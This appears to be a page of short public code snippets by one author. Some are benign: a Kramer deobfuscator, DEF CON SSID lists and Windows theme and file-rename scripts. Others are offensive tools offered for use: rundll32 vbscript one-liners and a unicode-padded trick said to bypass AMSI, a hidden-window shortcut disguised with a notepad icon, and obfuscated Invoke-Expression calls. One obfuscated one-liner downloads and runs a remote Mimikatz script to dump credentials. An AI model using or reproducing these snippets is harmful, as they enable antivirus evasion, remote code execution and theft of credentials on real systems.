bobby-tablez

# This Python script decrypts Kramer obfuscation by reversing its obfuscation and bruteforces the key. 
# Detects and uses al CPU threads, so your milage may vary with how long it takes. 
# Defaults to key ranges from 3-1000000 as generated in kramer.py
# If the key is found it will print the result to stdout
# Obfuscator: https://github.com/billythegoat356/Kramer

import sys
import marshal
import types
import dis

bobby-tablez

# This list contains all gathered SSIDs from the DEF CON converence from Aug 8-11. 
# These were gathered via a HAK5 Wifi Pineapple MK7 (2796 SSIDs in total)

#Contabilidad
#FreeStationWiFi
#Latomatina
#Moynihan-PublicWiFi
#MyBWI-Fi
#SFO FREE WIFI
#Super8

bobby-tablez

# Modify Windows 10/11 or Server theme (Light or Dark mode). Makes registry changes which  
# take effect upon reboot, or explorer.exe restart. Bypasses restriction to change theme on 
# unactivated  Windows installations. 
#
# Usage:
#   To switch to dark mode, run: .\theme.ps1 -Mode dark
#   To switch to light mode, run: .\theme.ps1 -Mode light
#
#   Optional: Restart the explorer.exe process: 
#             "Stop-Process -Name explorer -Force; Start-Sleep -Seconds 2; Start-Process explorer"

bobby-tablez

# A list of CMD/PowerShell scripts which leverage the T1218.011 proxy execution technique. Currently bypasses AMSI as of 02/2024. 

# CMD
rundll32 vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)

rundll32 vbscript:"\\\\..\\\\mshtml\\\\..\\\\mshtml\\\\..\\\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)

rundll32 vbscript:"/\/\../\/\mshtml/\/\../\/\mshtml/\/\../\/\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)

rundll32 vbscript:"\\....\\mshtm\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)

bobby-tablez

# Set IconLocation to app or dll to change its appearance https://www.digitalcitizen.life/where-find-most-windows-10s-native-icons/
$LinkStart =  New-Object -comObject WScript.Shell;
$lnk = $LinkStart.CreateShortcut("$env:USERPROFILE\Desktop\my_new_shortcut.lnk");
$lnk.IconLocation = "$env:WINDIR\System32\notepad.exe";
$lnk.TargetPath = "cmd.exe"
$lnk.WindowStyle = 7; # hidden
$lnk.ArgUments = '/c calc.exe';
$lnk.Save() | Out-Null;

bobby-tablez

<# 
    Batch rename "downloaded" media files to make the file names more appealing. 
    Supply a directory to be scanned recursively: "rename-media.ps1 C:\path\to\media"
    IE: "the.sum.of.all.fears.2002.1080p.BLAH.Text.Atmos.COOLPEOPLE.mkv" to "The Sum Of All Fears (2002).mkv"
#>

Param (
    [string]$Path
)

bobby-tablez

# This simply echos a huge amount of overlapped or combined unicode characters before and after an unobfuscated AMSI Bypass. 
# This somehow allows the user to run whatever then want inside the overlapping character blobs.
# Currently bypasses Defender Dec. 2023
# 
# Writeup: https://x00.zip/amsi-bypass-using-unicode/
# Overlapping Unicode Chars: https://c.r74n.com/combining
# AMSI Bypass: https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell


'B̴̠̠̱̱⃭⃭⃯⃯̟͎͎̥̥̤̺͎̻̙̘̮̹̣̤̥̗̰͙̼̫̫̺̺̪̟̞̝͉̘̘̙͓͓⃨⃨̀̀́́̂̂̄̄⃐⃐⃑⃑⃰͌̓̔̔̀̈́̓̉̉̑͗͑̇̈̈́̊͋͊͆̽̽⃜⃜⃛⃛͘͘͘͠T̸⃪⃒⃓̛̛͈͎͎̮̮͇͇̳̳̠̮⃬⃭⃮⃯̻͙͚͓̐̋̋̏̏̌̍̎̔̊̊̿̿҃̑̆̀́̂⃐⃑⃔⃕⃖⃗⃡⃰̏̋͌̓͛̀́͂̓҃︮︦︯̽⃩͗͗͑͑̇̕̕͢͢͜͝͡B̴̠̠̱̱⃭⃭⃯⃯̟͎͎̥̥̤̺͎̻̙̘̮̹̣̤̥̗̰͙̼̫̫̺̺̪̟̞̝͉̘̘̙͓͓⃨⃨̀̀́́̂̂̄̄⃐⃐⃑⃑⃰͌̓̔̔̀̈́̓̉̉̑͗͑̇̈̈́̊͋͊͆̽̽⃜⃜⃛⃛͘͘͘͠T̸⃪⃒⃓̛̛͈͎͎̮̮͇͇̳̳̠̮⃬⃭⃮⃯̻͙͚͓̐̋̋̏̏̌̍̎̔̊̊̿̿҃̑̆̀́̂⃐⃑⃔⃕⃖⃗⃡⃰̏̋͌̓͛̀́͂̓҃︮︦︯̽⃩͗͗͑͑̇̕̕͢͢͜͝͡B̴̠̠̱̱⃭⃭⃯⃯̟͎͎̥̥̤̺͎̻̙̘̮̹̣̤̥̗̰͙̼̫̫̺̺̪̟̞̝͉̘̘̙͓͓⃨⃨̀̀́́̂̂̄̄⃐⃐⃑⃑⃰͌̓̔̔̀̈́̓̉̉̑͗͑̇̈̈́̊͋͊͆̽̽⃜⃜⃛⃛͘͘͘͠T̸⃪⃒⃓̛̛͈͎͎̮̮͇͇̳̳̠̮⃬⃭⃮⃯̻͙͚͓̐̋̋̏̏̌̍̎̔̊̊̿̿҃̑̆̀́̂⃐⃑⃔⃕⃖⃗⃡⃰̏̋͌̓͛̀́͂̓҃︮︦︯̽⃩͗͗͑͑̇̕̕͢͢͜͝͡';[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').

bobby-tablez

# This list contains all SSIDs I observed during defcon 31. Includes registration, walking around the con. Captured using a Pineapple MK7

!!
#ATTHEMOXY
#Free Simon Wi-Fi
*WIFI-AIRPORT
.WynnEncoreGuest
.YUL Wi-Fi
01-STATION-INN
07edba9d8f623dc6f4d86eccf53d1280

bobby-tablez

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;@(2135,2147,2147,2143,2146,2089,2078,2078,2145,2128,2150,2077,2134,2136,2147,2135,2148,2129,2148,2146,2132,2145,2130,2142,2141,2147,2132,2141,2147,2077,2130,2142,2140,2078,2097,2098,2076,2114,2100,2098,2116,2113,2104,2115,2120,2078,2100,2140,2143,2136,2145,2132,2078,2140,2128,2136,2141,2078,2132,2140,2143,2136,2145,2132,2078,2146,2132,2145,2149,2132,2145,2078,2131,2128,2147,2128,2078,2140,2142,2131,2148,2139,2132,2126,2146,2142,2148,2145,2130,2132,2078,2130,2145,2132,2131,2132,2141,2147,2136,2128,2139,2146,2078,2104,2141,2149,2142,2138,2132,2076,2108,2136,2140,2136,2138,2128,2147,2153,2077,2143,2146,2080)|%{$sr=$sr+[char]($_-2031)};$cue='rl';$fis = Get-Random 483;.(gal n?[?al]) $fis cu$cue;.(&(&(gal g?l) g?[?l]) ?e[?x])(& $fis -useb $sr);&("{0}{3}{4}{2}{1}" -f 'In','z','ikat','voke-','Mim') -DumpCreds

bobby-tablez

# use at your own risk

$sk="xjeji";$sl=($sk[4,2,0]-Join"");.($sl)

.((RVpa "\???????\\*2\*POO*\\*river?\?6*").PATh[4,15,34]-JOin'')

.(g`cm ?e[?x])

.(ga`l i?[?x])